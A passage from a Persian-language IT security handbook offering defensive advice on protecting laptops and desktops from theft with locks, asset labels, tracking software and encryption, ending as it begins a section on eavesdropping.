‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻭ ﺍﻟﺒﺘﻪ ﮔﺎﻫﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺻﺎﺣﺐ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﺮﻭﻡ ﻛﻨﻨـﺪ ﺑـﻪ‬
‫ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ‪ .‬ﻣﻬﻢ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ؛ ﻏﺎﻟﺐ ﺳﺮﻗﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ‪ :‬ﻓﺮﺻﺖ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺪﻭﻥ ﻣﺤﺎﻓﻈﺖ ﺭﻫﺎ ﺷﺪﻩ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﻣـﻲﺭﻭﻧـﺪ‪ ،‬ﻣﺤﻜـﻢ‬
‫ﺑﺴﺘﻦ ﺁﻧﻬﺎ ﺑﻪ ﺟﺎﻳﻲ ﻣﺸﻜﻞ ﺍﺳﺖ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺩﻳﮕﺮ ﺳﻴﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ!(‪ ،‬ﻭ ﺑﻪ ﺳﺎﺩﮔﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﻣﻲﺭﺳﻨﺪ‪ .‬ﻛﺴﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ‬
‫ﻛﻴﻔﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻨﺪ‪ .‬ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﻛﻪ ﺳﺮﻗﺖ ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫـﺎ‬
‫ﺑﺨﺼﻮﺹ ﺩﺭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﻣﻌﻀﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ‪ .‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﺒﺎﻳﺪ ﺩﺭ ﻫﻴﭻ ﻛﺠﺎ ﻭ ﺑﺮﺍﻱ ﻫﻴﭻ ﻣﺪﺗﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ‬
‫ﺭﻫﺎ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﺗﺎﻛﺴﻲ ﻣﺴﺎﻓﺮﺕ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺻﻨﺪﻭﻕﻋﻘﺐ ﻣﺎﺷﻴﻦ‪ ،‬ﻧﺰﺩ ﺧﻮﺩﺗﺎﻥ ﻧﮕﻬﺪﺍﺭﻳﺪ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺧﻄﺮ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔـﻲ ﻳـﺎ ﺭﻭﻣﻴـﺰﻱ ﺭﺍ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﺯﻳـﺎﺩﻱ‬
‫ﻛﺎﻫﺶ ﺩﻫﻴﺪ‪.‬‬
‫ﻗﻔﻠﻬﺎ‬
‫ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺧﻮﺏ ﺣﻔﺎﻇﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻗﺖ‪ ،‬ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺁﻥ ﺍﺳﺖ‪ .‬ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺑﺴﺘﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﺑﻪ ﻣﻴﺰﻫﺎ ﻭ ﻛﺎﺑﻴﻨﺖﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﺮﻗﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺣﻤﻞ ﺁﺳﺎﻥ ﻳﻚ ﻋﺎﻣﻞ ﻣﻬﻢ ﻓﺮﻭﺵ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺻﻠﻲﺗﺮﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺍﺳـﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ‬
‫ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﺣﺘﻤﺎﻝ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻗﻞ ﺑﻄﻮﺭ ﻣﻮﻗﺖ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰ‪ ،‬ﻳﻚ ﻟﻮﻟﻪ ﻳـﺎ ﻳـﻚ ﺷـﻲﺀ ﺑـﺰﺭﮒ‬
‫ﺩﻳﮕﺮ ﻗﻔﻞ ﻛﻨﻴﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﻣﺠﻬﺰ ﺑﻪ ﻳﻚ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ‪ ۵۰‬ﺩﻻﺭ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﻗﻔـﻞ‬
‫ﻛﺎﺑﻠﻲ ﺧﺮﻳﺪ ﻛﻪ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ﺭﺍ ﺑﻪ ﺍﺷﻴﺎﺀ ﻧﺰﺩﻳﻚ ﺁﻥ ﻗﻔﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺳﺘﮕﺎﻩ ﺑﻪ ﺟﺎﻳﻲ ﻗﻔﻞ ﺷﻮﺩ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ‬
‫ﻛﻠﻴﺪ ﻳﺎ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﺑﻪ ﺩﺳﺘﮕﺎﻩ ﺁﻧﺮﺍ ﺑﺎﺯ ﻛﺮﺩ‪ ،‬ﻭ ﺩﺭﺻﻮﺭﺕ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻫﻢ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺁﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺍﻳﻨﮕﻮﻧـﻪ‬
‫ﻗﻔﻠﻬﺎ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻊ ﻗﺎﭘﻴﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺗﻮﺳﻂ ﺩﺯﺩﻫﺎﻱ ﺧﻴﺎﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺮﭼﺴﺐﺯﺩﻥ‬
‫ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺳﺮﻗﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ‪ ،‬ﺣﻜﺎﻛﻲ ﻧﺎﻡ ﻭ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻳﺎ ﺑﺮﭼـﺴﺐ ﺯﺩﻥ‬
‫ﺭﻭﻱ ﺁﻥ ﺗﻮﺳﻂ ﺑﺮﭼﺴﺐﺯﻧﻬﺎﻱ ﺛﺎﺑﺖ ﻳﺎ ﻧﻴﻤﻪﺛﺎﺑﺖ ﺍﺳﺖ‪ .‬ﻭﺟﻮﺩ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ‪ ،‬ﺍﺩﻋﺎﻱ ﻋﺪﻡ ﺍﻃﻼﻉ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺍﺯ ﻣـﺴﺮﻭﻗﻪ‬
‫ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺑﺮﭼﺴﺒﻬﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﺯﻧﻲ ﺧﻮﺏ ﺑﻪ ﻭﺿﻮﺡ ﻗﺎﺑﻞ ﺭﺅﻳﺖ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻮﺟﺐ ﻣﻲﺷـﻮﺩ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺑﺘﻮﺍﻧﺪ ﻣﺸﺨﺼﺎﺕ ﺁﻧﺮﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ‪ .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔﺬﺍﺭﻱ ﻛﻢﻫﺰﻳﻨﻪ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ﺭﺩﻳﺎﺑﻲ ﺍﻣﻦ ﻭﺳﺎﻳﻞ ﺩﻓﺘـﺮﻱ )‪ ٥٨(STOP‬ﺗﻮﻟﻴـﺪ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻪ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺗﻌﻠﻖ ﮔﺮﻓﺘﻪ ﻭ ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ‪ ۳‬ﺳﺎﻟﻪ ﺩﺭ ﺍﺭﻭﭘﺎ‪ ،‬ﺍﺳﺘﺮﺍﻟﻴﺎ‪ ،‬ﺁﻣﺮﻳﻜﺎﻱ ﻻﺗـﻴﻦ‪ ،‬ﻭ ﺁﻣﺮﻳﻜـﺎﻱ‬
‫ﺷﻤﺎﻟﻲ ﻫﻤﺮﺍﻩ ﺍﺳﺖ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻗﻄﻌﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎ ﺑﺮﭼﺴﺐ ‪ STOP‬ﭘﻴﺪﺍ ﺷﻮﺩ‪ ،‬ﺷﺮﻛﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺗﻴﺒﻲ ﺑﺪﻫﺪ ﻛـﻪ ﺑـﻪ ﻣﺎﻟـﻚ ﺍﺻـﻠﻲ‬
‫ﺑﺎﺯﮔﺸﺖ ﺩﺍﺩﻩ ﺷﻮﺩ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﺗﺮﻣﻴﻢ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ‬
‫ﺍﻣﺮﻭﺯﻩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ "ﺭﺩﻳﺎﺑﻲ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺭﺩﻳـﺎﺑﻲ ﺩﺭ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﭘﻨﻬﺎﻥ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻳﻚ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﺪ ﺗﺎ ﻣﺤﻞ ﺧﻮﺩ ﺭﺍ ﺍﻋﻼﻡ ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺗﻤﺎﺱ ﻣﻤﻜﻦ‬
‫)‪Secure Tracking of Office Property (http://www.stoptheft.com‬‬
‫‪58‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٢٨٧‬‬
‫ﻻ ﺍﺯ ﺍﻳﻦ ﺗﻤﺎﺳﻬﺎ ﺻﺮﻓﻨﻈﺮ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣـﺎ ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﻪ ﻛﻴﻔـﻲ ﺩﺭ‬
‫ﺍﺳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﻭ ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﺑﺎﺷﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺮﻛﺰ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﻌﻨﻮﺍﻥ "ﺩﺯﺩﻳﺪﻩﺷﺪﻩ" ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﭘﻠﻴﺲ ﺩﺭ ﺟﺮﻳﺎﻥ ﻣﺤﻞ ﻣﺤﻤﻮﻟﻪ ﺩﺯﺩﻱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻫﻢ ﻣﺜـﻞ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻻﻳﻲ ﺑﺮﺍﻱ ﺩﺯﺩﻳﺪﻩﺷﺪﻥ ﺩﺍﺭﻧﺪ ﺑﺪﻳﻨﺼﻮﺭﺕ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪.‬‬
‫ﺳﺮﻗﺖ ﺍﺟﺰﺍﺀ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻗﻴﻤﺖ ‪ RAM‬ﺑﺎﻻ ﺑﻮﺩ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺍﺯ ﺩﺯﺩﻳﻬـﺎﻱ ﻣﺘـﻮﺍﻟﻲ ‪ RAM‬ﺭﻧـﺞ ﻣـﻲﺑﺮﺩﻧـﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺎﻫﺪ ﺩﺯﺩﻳﻬﺎﻱ ﺑﺰﺭﮒ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩﻩﺍﻧﺪ‪ RAM .‬ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﺁﺧﺮﻳﻦ ﻣـﺪﻝ ﺑﺮﺍﺣﺘـﻲ ﺩﺭ ﺑـﺎﺯﺍﺭ‬
‫ﺁﺯﺍﺩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ‪ .‬ﺍﻳﻦ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺎﺭﻗﻴﻦ ﺗﻨﻬـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ ‪ RAM‬ﺩﺍﺧـﻞ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ‬
‫ﻣﻲﺩﺯﺩﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺑﮕﺬﺭﺩ ﺗﺎ ﻣﻮﺿﻮﻉ ﺁﺷﻜﺎﺭ ﺷﻮﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺷﻜﺎﻳﺖ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﻧﺎﮔﻬـﺎﻥ ﺑـﺴﻴﺎﺭ‬
‫ﺁﻫﺴﺘﻪﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺩﻳﺮﻭﺯ ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ RAM ،‬ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳـﺎ ‪ case‬ﺁﻥ ﺍﺯ ﺍﻳﻤﻨـﻲ ﻓﻴﺰﻳﻜـﻲ‬
‫ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻫﺪﺍﻑ ﺻﺎﺣﺐ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﻪ ﺑﻜﺎﺭ ﺧﻮﺍﻫـﺪ‬
‫ﺭﻓﺖ‪ .‬ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻓﺮﻭﺵ ﺑﺮﺳﺪ‪ ،‬ﻳﺎ ﺩﺭ ﻧﺎﻣـﻪﭘﺮﺍﻛﻨـﻲﻫـﺎﻱ‬
‫ﺑﺪﻧﺎﻡ ﻛﻨﻨﺪﻩ ﻭ ﻳﺎ ﺩﺭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﻼ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺖ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ؛ ﺑﺮﺍﻱ ﺍﻳـﻦ‬
‫ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻥ ﭼﻴﺰﻱ ﺭﺍ ﺍﺯ ﺳﺮﻗﺖ ﻛﺎﻣ ﹰ‬
‫ﻣﻨﻈﻮﺭ ﮐﺎﻓﻲ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﺳﺎﺭﻕ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻧﺪﺍﻧﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ‪ ،‬ﺣﺘﻲ ﺑﺎ ﺑﻬﺘـﺮﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧﻈﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻪ ﺷﻜﺴﺘﻦ ﺁﻥ ﻣـﺸﻜﻞ ﺑﺎﺷـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺷﻮﻧﺪ‪ .‬ﺗﻮﺻﻴﻪ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻱ ﺍﺳﺖ ﺗﺎ ﺣﺘﻲ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺑﻪ ﺳـﺮﻗﺖ ﺭﻓـﺖ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺳﻲ ﻛـﻪ ﺩﺭ ﺁﻥ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺮﺍﺣﺘﻲ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻭﺍﻗﻊ ﻧﺸﻮﺩ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺘﺮﺍﻕﺳﻤﻊ )ﺷﻨﻮﺩ(‬
‫ﺷﺎﻳﺪ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﺷﻮﻡﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﺑﺎ ﻣﻌﻤـﻮﻟﻲﺗـﺮﻳﻦ ﺗﺠﻬﻴـﺰﺍﺕ‪ ،‬ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﻭﻧﻮﺷﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺮﺑﺎﻧﻲ ‪ -‬ﻓﺸﺮﺩﻩﺷﺪﻥ ﻫﺮ ﺩﻛﻤﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭ ﻫـﺮ ﻗﻄﻌـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺻـﻔﺤﺔ‬
‫ﻻ ﻗﺮﺑـﺎﻧﻲ ﺍﺯ ﺣـﻀﻮﺭ ﻣﻬـﺎﺟﻢ‬
‫ﻧﻤﺎﻳﺸﮕﺮ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﻳﺎ ﺑﻪ ﭼﺎﭘﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺭﺍ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻴـﺎﻥ ﻣﻌﻤـﻮ ﹰ‬
